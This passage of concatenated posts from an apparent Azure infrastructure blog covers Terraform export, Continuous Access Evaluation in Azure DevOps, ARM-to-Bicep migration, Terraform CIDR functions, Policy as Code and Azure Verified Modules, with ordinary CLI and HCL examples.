`Microsoft.AzureTerraform` provider registered. If you skip this, the exporter will simply not work—no commands, no resource visibility, nothing. In the Azure Portal, head to your subscription's Resource Providers pane, search for `Microsoft.AzureTerraform`, and hit Register. ![Azure Portal Resource Provider Registration](https://stlwtechwebimages.blob.core.windows.net/images/2025-09-05-Azure-Resources-Terraform-Export/1757058334195.png) For CLI fans, run: ```bash az provider register -n Microsoft.AzureTerraform ``` This will take a minute or two to propagate. Only move on once it's confirmed. ## Get Setup, Importing The easy steps to getting your first import done.... ### 1. Install the Official VSCode Extension Pop open VSCode, search for "Microsoft Terraform", and install the extension. This slots in all the AzureRM, AzAPI, and MSGraph support you need—it's now the one extension to rule them all. ![VSCode Terraform Extension](https://stlwtechwebimages.blob.core.windows.net/images/2025-09-05-Azure-Resources-Terraform-Export/1757058408966.png) ### 2. Sign In and Open Export Make sure your Azure account is attached in VSCode, using the extension's login option. Open up the Command Palette and search for "Export Azure Resource as Terraform". ![Export Azure Resource as Terraform Command](https://stlwtechwebimages.blob.core.windows.net/images/2025-09-05-Azure-Resources-Terraform-Export/1757058474746.png) ### 3. Choose Your Provider `azurerm` makes sense for most but for new features and the latest resources you'll need `azapi`. ![Choose Terraform Provider](https://stlwtechwebimages.blob.core.windows.net/images/2025-09-05-Azure-Resources-Terraform-Export/1757058525147.png) ### 4. Select, Review, Export You'll be guided through picking your subscription, resource group, or even a single resource. The UI helps you choose exactly what to keep, with resource recommendations to match Azure types to Terraform blocks faithfully. Choose exporting either just the Terraform HCL code, or code plus Terraform state. Generally, exporting both is the ticket for "adopt and manage" workflows; code-only is helpful for careful refactoring and study. ![Select Resources to Export](https://stlwtechwebimages.blob.core.windows.net/images/2025-09-05-Azure-Resources-Terraform-Export/1757058553419.png) ### 5. Tidy, Review, and Own the Output A file is presented that you should save with a `.tf` suffix, explicitly so nothing gets overwritten. Expect all properties and dependencies to show up as hard-coded values and exposed relationships—good for accuracy, but you'll want to clean up for variables, secrets, and refactors fast. Sensitive information might be present if you export full properties, so always take a second pass before pushing to source control. ![Exported Terraform Code](https://stlwtechwebimages.blob.core.windows.net/images/2025-09-05-Azure-Resources-Terraform-Export/1757058578042.png) ## Refactoring and Next Steps The exported code is a springboard, not a final product. Loop in variables, providers, and backends once you've got your base files. Review links and dependencies to ensure production safety, not just representation—the exporter gets you remarkably close, but always merits a manual double-check. ## Thoughtful Automation For repeated exports, tap the non-interactive mode and append flags to add resources to existing state files and repos. The extension is built for iterative, repeatable onboarding—far easier than a wholesale migration rewrite. If you want to go further you can read up on this here: [Azure Export for Terraform concepts | Microsoft Learn](https://learn.microsoft.com/en-gb/azure/developer/terraform/azure-export-for-terraform/export-terraform-concepts) ## Finally There's no longer any reasonable excuse to leave legacy Azure resources unmanaged or Terraform-free. With a few minutes and two prerequisite steps (registering the provider, installing the extension) you can capture your Azure estate as code, unlock versioning and gain end-to-end governance almost instantly. This isn't just a time-saver. It's a tool for changing how infrastructure is managed, adopted, and understood. It puts real cloud structures into the hands of real engineers, not just "admins with a portal login". --- # Real-Time DevOps Security: What Continuous Access Evaluation Means for Your Azure Pipelines - URL: https://blog.l-w.tech/blog/2025-08-20-Real-Time-DevOps-Security-CAE - Date: 2025-08-20 - Author: Elliott Leighton-Woodruff - Tags: Azure, DevOps, Security, Azure DevOps, Continuous Access Evaluation, CAE, Entra ID, Conditional Access, Authentication, Zero Trust Microsoft's rollout of Continuous Access Evaluation in Azure DevOps transforms authentication from 'set and forget' to real-time security enforcement that actually works. If you've been managing Azure DevOps recently, you might have noticed something's changed with authentication. No, it's not your imagination, and no, clearing your browser cache won't fix it. Microsoft's quietly rolled out Continuous Access Evaluation (CAE) across the platform, and honestly, it's about time our DevOps security caught up with the reality that people occasionally do daft things with their credentials. ## What Actually Is CAE? Remember the good old days when OAuth tokens were like those all-day parking tickets – valid until they expired, regardless of whether you'd driven your car into a lake? Azure DevOps used to work the same way. Get a token, keep it for up to an hour, even if your account got disabled, your password got reset, or you'd been caught using "Password123!" in production. CAE is Microsoft's way of saying "that's ridiculous, let's fix it." Instead of waiting around for tokens to naturally expire like they're on some sort of spa retreat, the system can now revoke access faster than you can say "why is my pipeline failing?" The magic happens when these events occur: - User accounts getting the boot (disabled or deleted) - Password changes (hopefully to something better than "Password124!") - Admin panic buttons getting pressed (token revocations) - MFA is suddenly being enforced (someone finally read that security audit) - Suspicious location changes (your DevOps engineer is definitely not deploying from a beach in Bali) You can read the full technical details in [Microsoft's Continuous Access Evaluation documentation](https://learn.microsoft.com/en-us/azure/devops/release-notes/roadmap/2025/continuous-access-evaluation), though fair warning – it's less entertaining than this article. ## Why Does It Matter? Traditional token-based security in CI/CD pipelines is like leaving your house keys under the doormat and hoping noone checks the obvious hiding spots. You're putting blind faith in tokens, hoping that nothing terrible happens to user credentials between token creation and that blessed moment of expiry. In DevOps land, where your pipelines have keys to the kingdom (and by kingdom, I mean production databases that definitely shouldn't be dropped), this optimistic approach to security was always a bit concerning. CAE means your security posture isn't held hostage by token lifetimes anymore. Someone's credentials get compromised? Access stops immediately. Former colleague tries to "help" by pushing one last "quick fix"? Not happening. It's like having a bouncer for your build system, except this bouncer actually pays attention. For Infrastructure as Code deployments, this is particularly brilliant. Your pipelines are often creating resources, managing configurations, and generally having a grand time with permissions that could terraform your entire cloud estate. The last thing you need is Bob from Accounting (who left six months ago) still having deployment rights because his token hasn't expired yet. ## What Changes for Your Pipelines The excellent news is that for most teams, CAE will be about as noticeable as a well-written Terraform plan – it just works, and you don't have to think about it. The Azure DevOps web interface handles it automatically, so if you're clicking buttons in a browser like the rest of us, you probably won't notice much beyond the warm fuzzy feeling of improved security. However, if you're one of those clever folks building custom integrations or wrestling with .NET client libraries, there are some changes worth knowing about. CAE can trigger what's diplomatically called a "claims challenge" – which is Microsoft's polite way of saying "we need to have another chat about whether you should be doing what you're doing." Your applications might need to handle these gracefully, which typically involves: - Recognising CAE error responses (they're usually quite clear about what's wrong) - Asking users to prove they're still who they claim to be - Not having a complete meltdown when access gets temporarily interrupted [Microsoft's DevOps Blog post on CAE implementation](https://devblogs.microsoft.com/devops/real-time-security-with-continuous-access-evaluation-cae-comes-to-azure-devops/) covers the technical details if you're into that sort of thing. For standard DevOps workflows – web interface clicking, sensible REST API usage, or using tools that weren't cobbled together with duct tape – this all happens behind the scenes like a good security feature should. ## Integration with Conditional Access Policies This is where things get properly interesting for enterprise environments. CAE works beautifully with Entra ID Conditional Access policies, which means you can finally build sophisticated access controls. Want production deployments to only happen from the office? Set up a policy. Need MFA for anything that touches customer data? Configure it once, and CAE will enforce it faster than you can say "why didn't we think of this sooner?" The combination of Infrastructure as Code with real-time security evaluation opens up some rather elegant possibilities: - Location-aware deployment controls (no more "working from the beach" surprises) - Risk-based approvals that actually consider current security conditions - Automatic pipeline shutdowns if security policies decide things have gone pear-shaped [Microsoft's Conditional Access documentation](https://learn.microsoft.com/en-us/azure/active-directory/conditional-access/) explains how to set these up, though you might want to start small unless you enjoy explaining to colleagues why they suddenly can't deploy anything. ## Security Architecture Evolution CAE represents a sensible shift from "set it and forget it" security to something more like "set it and trust it to stay sensible." Instead of configuring permissions and hoping they age well like a fine wine, we're moving towards security that adapts to changing conditions like a well-written Ansible playbook. This aligns beautifully with Infrastructure as Code practices, where we've already accepted that infrastructure should be dynamic rather than a monument to decisions made in 2019. Applying the same thinking to access control makes perfect sense – security policies should be as responsive as the infrastructure they're protecting, and significantly more reliable than that Bash script everyone's afraid to touch. The combination of CAE with proper IaC governance gives you security that actually matches how teams work in practice. Define access controls as code, deploy them consistently, and trust them to enforce sensibly regardless of whatever interesting events occur at 3 AM. ## Looking Forward Microsoft's CAE rollout across Azure DevOps is just the opening act. Expect similar real-time security evaluation to spread across other Azure services, particularly those involved in operations that could cause interesting conversations with senior management if they go wrong. For teams who take DevOps security seriously (and let's face it, we all should after the last few years of security incidents), now's the time to consider how continuous access evaluation fits into your security architecture. The technology's here, it's rolling out whether you asked for it or not, and organisations that adapt their processes will have a significant advantage over those still relying on tokens that expire sometime around tea time. The era of "configure once and assume it'll be fine" security is ending faster than you can say "zero trust architecture." CAE gives us tools to implement access control that actually matches the reality of modern DevOps – dynamic, responsive, and considerably less optimistic about human nature than previous approaches. Real-time security enforcement isn't just a nice-to-have feature anymore – it's becoming essential for any organisation that wants to sleep soundly knowing their DevOps workflows aren't being managed by expired tokens and good intentions. ## Want to learn more? - [Azure DevOps CAE Implementation Details](https://devblogs.microsoft.com/devops/real-time-security-with-continuous-access-evaluation-cae-comes-to-azure-devops/) - [Microsoft's CAE Technical Documentation](https://learn.microsoft.com/en-us/azure/devops/release-notes/roadmap/2025/continuous-access-evaluation) - [Conditional Access Policies Guide](https://learn.microsoft.com/en-us/azure/active-directory/conditional-access/) - [Azure DevOps REST API Reference](https://learn.microsoft.com/en-us/rest/api/azure/devops/) --- # Podcast | Demystifying Infrastructure as Code for Microsoft 365 and Azure - URL: https://blog.l-w.tech/blog/2025-08-18-IaC-for-Microsoft-365-Azure - Date: 2025-08-18 - Author: Elliott Leighton-Woodruff - Tags: Azure, Microsoft 365, Infrastructure as Code, Terraform, Bicep, ARM Templates, DevOps, Podcast, AI, MSP Discussing IaC fundamentals, ARM vs Bicep vs Terraform, and AI-assisted workflows with Zach and Ben on 365 Explained. Had a lot of fun joining Zach and Ben on 365 Explained to demystify Infrastructure as Code for the Microsoft 365 and Azure crowd. ## What We Covered ### IaC Fundamentals What Infrastructure as Code actually is in an Azure and M365 context, why "click-ops" does not scale and a simple rule of thumb for when something should move from the portal into code. ### ARM vs Bicep vs Terraform The differences between ARM, Bicep and Terraform—when Bicep is perfectly fine, when Terraform's state and multi-cloud support really matter and why state files need treating with extreme care. ### Standardisation and Multi-Tenant Value How IaC helps standardise tenants, tagging and security, why MSPs and multi-tenant teams get outsized value and some real-world war stories where bad state handling took down production. ### AI and IaC Workflows Where AI and Copilot can accelerate IaC workflows, and where blindly trusting generated Terraform/Bicep is a fast route to accidentally deleting the wrong resources. ## Who This Is For If you work with Microsoft 365, Azure or run managed environments and want a practical intro to IaC, this conversation will help you understand when and how to make the move from manual configuration to code-based infrastructure.

🎙️Catch the Full Episode

365 Explained - Demystifying Infrastructure as Code

## Key Takeaways - **Click-ops doesn't scale** - Manual configuration is fine for experimentation, but production environments need repeatability - **Choose your IaC tool based on scope** - Bicep for Azure-only, Terraform when you need state management or multi-cloud - **State files are critical** - Treat Terraform state with the same care as production data—corruption or loss can be catastrophic - **Multi-tenant teams benefit most** - MSPs and organisations managing multiple environments get exponential value from IaC standardisation - **AI is a productivity tool, not autopilot** - Use Copilot to accelerate IaC development, but always review before applying changes Infrastructure as Code isn't just about automation—it's about making infrastructure decisions explicit, reviewable and repeatable. If you're still clicking through portals for production changes, it's time to make the shift. --- # Azure Templates: ARM To Bicep - URL: https://blog.l-w.tech/blog/2025-08-13-Azure-Templates-ARM-To-Bicep - Date: 2025-08-13 - Author: Elliott Leighton-Woodruff - Tags: Azure, Bicep, ARM Templates, Infrastructure as Code, Azure Resource Manager, DevOps, Migration, Automation Modernize your Azure infrastructure by migrating legacy ARM JSON templates to cleaner, more maintainable Bicep code. Suppose you've ever inherited an Azure estate. In that case, you know the deal: a graveyard of JSON ARM templates, each one slightly different, nobody quite sure what's actively deployed and just enough quirks to keep you guessing. Maybe you've come into the business with the Bicep skill, ready to take the company by storm, or perhaps you've noticed that ARM doesn't seem to be getting the love it deserves but Bicep is and you feel like you're missing out! So, what does it take to drag that spaghetti mess into Bicep without breaking production or losing your sanity? ## ARM vs Bicep? - **Readability**: Bicep is clean, concise, and (almost) readable by actual humans. ARM JSON? Not so much. - **Reusability**: Modules and parameter files are dead simple in Bicep. No more copy-paste purgatory. - **Refactoring**: No more hours staring at blocks of code wondering what they even do. - **Azure support**: New features land in Bicep first. ARM catches up… eventually. - **Longevity**: ARM's not officially dead, but let's be honest. Bicep's the future. ## The prep - **Audit**: List every template actually in use—half of them are probably out of date, unused or specific to old projects. Start by binning them. - **Set up source control**: If it's not already in Git, get it there. You want to track every change, before and after migration. - **Automated conversion**: Fire up the Azure Bicep CLI (`bicep decompile`) and convert your ARM JSON to Bicep. Don't expect magic, it's not going to work first time everytime. ## Bicep 'decompiling' This requires Bicep installed either locally or on your agent, you can find the steps for various methods here: [Install Bicep tools - Azure Resource Manager | Microsoft Learn](https://learn.microsoft.com/en-us/azure/azure-resource-manager/bicep/install) ### 1. Run the decompiler Once installed, open a terminal where your ARM JSON lives and run: ```bash az bicep decompile --file mytemplate.json ``` This gives you a `.bicep` file with most of the resources mapped across. Review the output carefully, because the tooling still can't untangle every parameterisation or nested resource. ### 2. Untangle and refactor - **Remove dead parameters**: ARM is parameter-happy. Bicep simplifies this, so drop anything unused. - **Modularise**: Break up massive templates into sensible, reusable Bicep modules (think: networking, compute, storage). - **Rename and Document**: ARM resource names are often...garbage. Use this as a chance to bring clear, descriptive naming and decent comments. ### 3. Validate with What-If Use Azure's what-if deployment feature to ensure the converted Bicep will not destroy your platform: ```bash az deployment sub what-if --template-file main.bicep ``` Catch resource drift or accidental removals before you hit apply, not after. ### 4. Pipeline-ready - **Add linting**: Drop Bicep linter into your pipeline (it'll catch style and basic errors). - **Automate deployments**: Bicep slides right into Azure DevOps or GitHub Actions. Set up CI/CD so no one merges broken code. - **Stage rollouts**: Deploy Bicep to a test subscription/management group before taking a swing at prod. ## The gotchas - Some complex ARM features (like a few loops or deeply nested resources) need manual rework in Bicep. - Permissions, resource locks, and RBAC ideally live outside your Bicep if possible—the migration is a great time to fix this. - Tag everything. Even with Bicep's clean syntax, untangling dozens of old resources later is never fun. ## Wrapping up Migrating from ARM to Bicep isn't instant, but it's worth the effort every time you need to make changes, explain your infra, or onboard new bodies. Cleaner code, faster deployments, less "what on earth does this do?" If you've still got dusty old ARM templates hanging around, it's about time to let them go. --- # IP Allocation Like a Boss: Winning Patterns for Azure Networking in Terraform - URL: https://blog.l-w.tech/blog/2025-07-30-IP-Allocation-Azure-Terraform - Date: 2025-07-30 - Author: Elliott Leighton-Woodruff - Tags: Azure, Terraform, Networking, Infrastructure as Code, VNet, CIDR, Best Practices, Automation Master dynamic IP allocation in Azure with cidrsubnet, cidrsubnets, and cidrhost for scalable, error-free networking. If you know me, you'll know I'm always searching for ways to cut effort and make our Terraform modules genuinely reusable. The whole point of Infrastructure as Code is to keep things simple and let teams deliver fast without friction. The right patterns make the difference. Here's exactly how I use `cidrsubnet`, `cidrsubnets` and `cidrhost` together with actual Azure resources real world, no spreadsheets. ## 1. Use cidrsubnet for VNet allocation from a regional range If you're working within a big enterprise, chances are you'll be handed a broad regional range by the network lead. Let's say you get `10.32.0.0/11` for the whole of a region. Now, each VNet needs a clean, isolated slice. Instead of allocating these ranges one at a time by hand, try this: ```hcl variable "region_cidr" { default = "10.32.0.0/11" } variable "vnet_index" { default = 2 } # Choose third VNet for this example locals { vnet_cidr = cidrsubnet(var.region_cidr, 5, var.vnet_index) # /16 per VNet } resource "azurerm_virtual_network" "main" { name = "vnet-${var.vnet_index}" address_space = [local.vnet_cidr] resource_group_name = azurerm_resource_group.main.name location = azurerm_resource_group.main.location } ``` No copy-paste errors—just a variable and you've got unique, sequential VNet blocks ready for any region. ## 2. Use cidrsubnets for multiple subnets in your VNet Your VNet's no good without subnets for workloads, databases and management. Here's how I divvy up the VNet range without calculators or trial-and-error: ```hcl locals { subnet_sizes = [4, 6, 8] # App /20, Data /22, Mgmt /24 subnet_list = cidrsubnets(local.vnet_cidr, local.subnet_sizes...) } resource "azurerm_subnet" "app" { name = "app" resource_group_name = azurerm_resource_group.main.name virtual_network_name = azurerm_virtual_network.main.name address_prefixes = [local.subnet_list[0]] } resource "azurerm_subnet" "data" { name = "data" resource_group_name = azurerm_resource_group.main.name virtual_network_name = azurerm_virtual_network.main.name address_prefixes = [local.subnet_list[1]] } resource "azurerm_subnet" "mgmt" { name = "management" resource_group_name = azurerm_resource_group.main.name virtual_network_name = azurerm_virtual_network.main.name address_prefixes = [local.subnet_list[2]] } ``` Now subnet sizes and assignments are variable-driven. Change your needs and the code adapts instantly. Need to expand? Add another tier, tack on another seed bit. The maths is all handled and there's no risk of overlap with neighbouring subnets. ## 3. Use cidrhost for static IPs (e.g. Network Adapter, Gateway) You want consistent addresses, say for a jump box, firewall, or gateway? Grab a fixed address in any subnet without counting: ```hcl locals { app_gateway_ip = cidrhost(local.subnet_list[0], 4) # The 4th IP in Application subnet } resource "azurerm_network_interface" "app_gw" { name = "appgw-nic" location = azurerm_resource_group.main.location resource_group_name = azurerm_resource_group.main.name ip_configuration { name = "internal" subnet_id = azurerm_subnet.app.id private_ip_address_allocation = "Static" private_ip_address = local.app_gateway_ip } } ``` This makes static address management dead simple and nobody's risking duplicate assignments or manual missteps. ## 4. Bringing it all together: dynamic, extensible, foolproof Combine the three into a pattern your whole team can use, scale, and hand off: ```hcl variable "region_cidr" { default = "10.32.0.0/11" } variable "vnet_index" { default = 2 } variable "subnet_sizes" { default = [4, 6, 8] } locals { vnet_cidr = cidrsubnet(var.region_cidr, 5, var.vnet_index) subnet_list = cidrsubnets(local.vnet_cidr, var.subnet_sizes...) subnet_names = ["app", "data", "mgmt"] # Create maps with custom keys subnets = { for i, subnet in local.subnet_list : local.subnet_names[i] => subnet } gateway_ips = { for i, subnet in local.subnet_list : local.subnet_names[i] => cidrhost(subnet, 1) } } resource "azurerm_virtual_network" "main" { name = "vnet-${var.vnet_index}" address_space = [local.vnet_cidr] resource_group_name = azurerm_resource_group.main.name location = azurerm_resource_group.main.location } resource "azurerm_subnet" "all" { for_each = local.subnets name = "subnet-${each.key}" resource_group_name = azurerm_resource_group.main.name virtual_network_name= azurerm_virtual_network.main.name address_prefixes = [each.value] } resource "azurerm_network_interface" "gateways" { for_each = local.subnets name = "gw-nic-${each.key}" location = azurerm_resource_group.main.location resource_group_name = azurerm_resource_group.main.name ip_configuration { name = "internal" subnet_id = azurerm_subnet.all[each.key].id private_ip_address_allocation = "Static" private_ip_address = local.gateway_ips[each.key] } } ``` ## Real-world advice - If environments grow, just bump the count or tier variables. No rewiring or error-prone copy-pasting required. - For environments that cover multiple regions, wrap the logic in a module and feed regional CIDRs and indices from a single, simple root. - `cidrhost` is gold for static assignments or gateways. Nobody needs to second-guess which IP's in use. ## Wrapping up Getting this set up right means you sidestep so many headaches later: no overlapping networks, no scrambling for available IPs, no brittle hand-edited configs. Your Terraform modules become drop-in building blocks anyone on the team will grasp at a glance. If you're still hardcoding subnets or tracking them in a spreadsheet, you're giving yourself needless work. Happy to show you how this fits into bigger Azure blueprints or to talk through real-world patterns that save time and keep mistakes out of cloud networking. Drop me a line if you want hands-on code or just a chat about what's new in clever IaC. --- # Podcast | Azure Migration: Beyond Lift and Shift - URL: https://blog.l-w.tech/blog/2025-07-19-Azure-Migration-Beyond-Lift-and-Shift - Date: 2025-07-19 - Author: Elliott Leighton-Woodruff - Tags: Azure, Cloud Migration, Infrastructure as Code, Terraform, Cost Optimization, SaaS, DevOps, Podcast Discussing migration strategies, IaC, cost optimization and SaaS vs build decisions on the sql_squared podcast. I recently had the pleasure of joining David on the sql_squared podcast to discuss something I'm passionate about: doing Azure migrations properly. Too many organisations treat cloud migration as simply lifting and shifting VMs into someone else's data centre, missing out on the transformational benefits that cloud platforms can deliver. ## What We Covered ### The Five Rs of Migration Rather than defaulting to a like-for-like move that delivers minimal business value, we explored the Five Rs framework: - **Rehost** - The classic "lift and shift" approach - **Refactor** - Minimal code changes to leverage cloud capabilities - **Rearchitect** - Significant changes to optimize for cloud-native services - **Rebuild** - Starting fresh with cloud-native architecture - **Replace** - Moving to SaaS alternatives The key is choosing the right approach for each workload based on business value, not defaulting to rehost because it feels safer. A like-for-like move often means expensive infrastructure with none of the agility, scalability or cost benefits that justify the migration in the first place. ### Infrastructure as Code: More Than Just Automation We discussed how tools like Terraform and OpenTofu fundamentally change how teams approach Azure deployments. IaC isn't just about automation—it's about: - **Standardising landing zones** so every environment is consistent and compliant from day one - **Reducing human error** by codifying infrastructure decisions and guardrails - **Improving developer experience** by giving teams self-service capabilities without sacrificing governance - **Eliminating waste** by stopping teams from burning weeks on repetitive environment builds When you're migrating to Azure, IaC should be part of the strategy from the start, not bolted on later. ### Azure Cost Traps One of the most valuable parts of the conversation was around common cost pitfalls we see organisations fall into: - **Defender for Storage** - Easy to enable, expensive at scale if not configured correctly - **Excessive logging** - Every GB adds up, especially when retention is set and forgotten - **Consumption-based data services** - Great for agility, but can balloon if not monitored The solution? Design with Total Cost of Ownership (TCO) in mind from day one. Leverage reserved capacity where it makes sense. Build cost awareness into your architecture decisions, not just your monthly invoice review. ### SaaS First vs Build: Making the Right Call We also explored when to embrace SaaS and when it makes sense to build. The key considerations: - **Internal IP and long-term ownership** - Does this differentiate your business? - **Control vs convenience** - What level of customisation do you actually need? - **TCO over time** - Factor in maintenance, updates and scaling costs For most organisations, the answer is SaaS first for commodity services (auth, messaging, monitoring) and build only where you're creating genuine competitive advantage. ## Who This Is For If you're working on Azure migrations, app modernisation or leading a DevOps or data platform team, this conversation is worth your time. We covered practical strategies and real-world lessons learned from organisations that got it right (and some that didn't).

🎙️ Watch the Full Episode

sql_squared podcast - Azure Migration Beyond Lift and Shift

YouTube
## Key Takeaways - **Migration strategy matters more than migration speed** - A poor migration completed quickly is still a poor outcome - **IaC should be foundational, not optional** - It's the difference between building on sand and building on rock - **Cost optimisation starts at design time** - Not in the first monthly bill review - **SaaS first, build only when it matters** - Your business likely isn't differentiated by how you run your auth system Cloud migration is a chance to transform how you deliver technology, not just where it runs. Make sure you're getting the value you're paying for. --- # Policy as Code for Azure - Worth your time? - URL: https://blog.l-w.tech/blog/2025-07-15-EPAC-Policy-As-Code - Date: 2025-07-15 - Author: Elliott Leighton-Woodruff - Tags: Azure, Policy as Code, Terraform, Bicep, EPAC, Governance, Compliance, Infrastructure as Code Transform Azure governance from manual portal clicking to version-controlled Policy as Code for consistency and compliance. Let's be honest, nobody gets into cloud because they love governance, but at some point you realise that clicking around the portal isn't cutting it especially when the auditors start poking about. Hunting through Azure's portal for half-remembered settings just doesn't scale, especially if you've got more than a single environment. This is where policy as code steps in: visible, reviewed, and predictable enforcement, right there alongside your infrastructure. ## Why PaC (Policy-as-Code)? A manual governance approach is slow, error-prone and rarely matches between dev, test and prod. Moving to code means: - No more drift between subscriptions or environments - Every change is tracked and reviewable (so you know what broke and why) - Easy audit compliance "Yes, it's in Git" - Undo or fix mistakes by rolling back, rather than click-hunting ## Terraform If your team already uses Terraform (and let's face it, most mature Azure teams do), rolling policies into your workflow just makes sense. Terraform's support for Azure Policy lets you deal with both infrastructure and governance using the same language and pipelines. ### Prerequisites - Terraform installed (grab it from HashiCorp's site) - Azure subscription and appropriate permissions (Contributor or above for most things; Policy Contributor for policy work) - A Git repository to store your code and track changes - Either Azure CLI or Azure PowerShell set up locally ### Define the policy you want to use Let's say you want every resource to prevent storage account from being made public (because someone on your team will definitely forget). There's an inbuilt policy for this we just need to call it with a data resource: ```hcl data "azurerm_policy_definition_built_in" "sa_public_access" { display_name = "Storage account public access should be disallowed" } ``` You can view the actual policy here: [Block public access to SA - Azure Policy](https://portal.azure.com/#blade/Microsoft_Azure_Policy/PolicyDetailBlade/definitionId/%2Fproviders%2FMicrosoft.Authorization%2FpolicyDefinitions%2F13502221-8df0-4414-9937-de9c5c4e396b) And the list of all built in policies here: [List of built-in policy definitions](https://learn.microsoft.com/en-us/azure/governance/policy/samples/built-in-policies) Additionally, defining custom policies can be achieved using: [azurerm_policy_definition | Terraform Registry](https://registry.terraform.io/providers/hashicorp/Azurerm/latest/docs/resources/policy_definition) ### Assign the policy Here you decided, should this be assigned to a management group, a subscription or even lower still? Generally I'd always recommend management group level policies and at the highest level you can afford too, though development and production environments have different needs so keep that in mind. ```hcl resource "azurerm_management_group_policy_assignment" "sa_public_access" { policy_definition_id = data.azurerm_policy_definition_built_in.sa_public_access.id management_group_id = azurerm_management_group.root.id description = "This policy ensures that storage account public access is disallowed." display_name = "Storage account public access should be disallowed" name = "sa_public_access" parameters = jsonencode({ "effect" = { "value" = "deny" } }) depends_on = [ azurerm_storage_container.container ] } ``` Worth noting the above denies the creation of the resource, though you could set this to audit if you just wanted to report. ### Apply an exemption, if needed There's various reasons why you might want an exemption, ensuring these are in code keeps the whole process well audited and can provide key insights when that pesky auditor starts asking you questions! ```hcl resource "azurerm_resource_policy_exemption" "tfstate" { name = "tfstate-exemption" policy_assignment_id = azurerm_management_group_policy_assignment.sa_public_access.id resource_id = azurerm_storage_account.sa.id exemption_category = "Waiver" } ``` ### CI/CD It's not policy as code if you're pushing from local every time. Hook Terraform into your CI/CD pipeline, Azure DevOps, GitHub Actions, whatever fits. Pipelines should: - Run terraform plan on PRs to preview changes - Require review before terraform apply - Store the state securely (prefer backends like Azure Storage for tfstate) No more "who made this change?" dramas. ## What about Bicep or EPAC? Not every team wants to learn HCL (the Terraform language), or maybe your estate is 100% Azure and you want the shortest path. ### Bicep - **Azure-native**: Bicep is purpose-built for Azure not cloud-agnostic, but tight integration and easy syntax. - **No external state file**: State is always what's live in Azure. Good and bad no risk of state file loss, but rollbacks need extra care. - **Policy Support**: Can define and assign policies, though less mature for governance workflows than Terraform. - **When to Use**: You want native Azure support, a gentle learning curve, and direct integration with ARM templates. ### EPAC (Enterprise Policy as Code) - **Azure Policy Focused**: EPAC is all about policy, not infra it's Microsoft's automation and governance toolkit built for environments with serious audit needs. - **Source of Truth**: Your repo defines the desired state. If it's not in Git, it gets deleted that's powerful, but be careful in brownfield setups. - **CI/CD-Friendly**: Designed for pipelines; integrates with Azure DevOps and GitHub Actions for controlled, reviewed deployments. - **Advanced Extras**: Supports documentation automation, policy exemptions and is the best fit if you want to wrangle lots of management groups or need built-in compliance reports. ## Let's go! There you have a solid way to stop governance being "someone else's problem". Start in code, start simple, and make sure policy gets as much love as your app code, because trust me the auditors look just as hard at both. ### Terraform Resources: - [Quickstart: New policy assignment with Terraform](https://learn.microsoft.com/en-us/azure/governance/policy/assign-policy-terraform) - [azurerm_management_group_policy_assignment | Terraform Registry](https://registry.terraform.io/providers/hashicorp/Azurerm/latest/docs/resources/management_group_policy_assignment) ### Bicep Resources: - [Quickstart: Create policy assignment using Bicep file](https://learn.microsoft.com/en-us/azure/governance/policy/assign-policy-bicep?tabs=azure-powershell) ### EPAC Resources: - [Advanced Azure Policy management - Cloud Adoption Framework](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/policy-management/enterprise-policy-as-code) - [Start Implementation - Enterprise Policy As Code (EPAC)](https://azure.github.io/enterprise-azure-policy-as-code/start-implementing/) --- # Terraform Azure Verified Modules: What, Why and How to Use Them - URL: https://blog.l-w.tech/blog/2025-07-08-TF-Azure-Verified-Modules - Date: 2025-07-08 - Author: Elliott Leighton-Woodruff - Tags: Azure, Terraform, Azure Verified Modules, Infrastructure as Code, DevOps, Best Practices Use Microsoft's Azure Verified Modules for secure, consistent Terraform deployments. If you’ve spent any time building things on Azure with Terraform, you’ll know the pain of hunting down decent modules. Some are solid, some are a bit sketchy, and some… well, let’s just say I wouldn’t trust them with a dev environment, never mind production. Microsoft’s Azure Verified Modules (AVM) are here to bring a bit of order to the chaos. So, what’s the deal? Here’s what you actually need to know. No vendor fluff, just the good bits, the gotchas, and how to get started. ### What Are Azure Verified Modules? Think of AVM as Microsoft’s “official” Terraform modules for Azure. They’re built and maintained by Microsoft, with help from the community, and designed to make your deployments less painful and more predictable. - **Microsoft-backed:** Not just another random GitHub repo. These are the real deal. - **Best practice by default:** Security and compliance baked in from the start. - **Modular:** Mix and match or build up more complex stuff as needed. - **Easy to get:** All in the [Terraform Registry](https://registry.terraform.io/), so you’re not digging through forums for the latest version. --- ### Why Bother With AVM? Most teams end up with a Frankenstein’s monster of Terraform modules—different naming, random tagging, and the odd “temporary” hack that’s still there two years later. AVM aims to fix this by giving you: - One place for modules that follow Microsoft’s latest guidance. - Quicker onboarding, so new starters can actually make sense of the codebase. - Less drift, with updates and bug fixes coming straight from Microsoft. - Easier audits, with clear policies and docs so compliance isn’t a nightmare. If you’re tired of endless debates over naming conventions or fixing the same security issues repeatedly, AVM is worth a look. --- ### What Can You Actually Use Right Now? The AVM library is growing fast. As of July 2025, you’ll find modules for: - Virtual networks - Subnets - Storage accounts - Key vaults - Private endpoints - Managed identities - Network security groups - App Service plans - And more on the way Microsoft and the community are focusing on what people actually use, so expect more to land soon. --- ### How Do You Use AVM Modules in Terraform? It’s simple. Add a module block, just like you would with anything else. Here’s an example for a virtual network: ```hcl module "avm-res-network-virtualnetwork" { source = "Azure/avm-res-network-virtualnetwork/azurerm" version = "0.9.2" address_space = "10.1.1.0/24" location = "UK South" resource_group_name = "Test" } ``` This module supports: - Creating a new virtual network - Creating a new subnet - Creating a new virtual network peering - Associating DNS servers with a virtual network - Associating a DDOS protection plan with a virtual network - Associating a network security group with a subnet - Associating a route table with a subnet - Associating a service endpoint with a subnet - Associating a virtual network gateway with a subnet - Assigning delegations to subnets [Azure/avm-res-network-virtualnetwork/azurerm | Terraform Registry](https://registry.terraform.io/modules/Azure/avm-res-network-virtualnetwork/azurerm/latest) **Quick tips:** - Always pin your module versions. No one likes surprises on a Friday afternoon. - Read the docs. There’s a lot you can tweak and some defaults are opinionated. - Treat AVM modules as building blocks, not a one-size-fits-all solution. --- ### What’s Different About AVM? - Every module is reviewed and tested by Microsoft. - Naming, tagging, and structure are consistent. - Security and compliance are built in. - Proper docs and examples, so you’re not guessing what a variable does. --- ### Watch Outs (Because Nothing’s Perfect) - **Defaults are opinionated:** Microsoft’s best practice might not match your legacy setup. Always check before rolling out at scale. - **Breaking changes can happen:** Test upgrades somewhere safe before you hit production. - **Some modules have a lot of options:** Start simple and build up as you go. - **Not 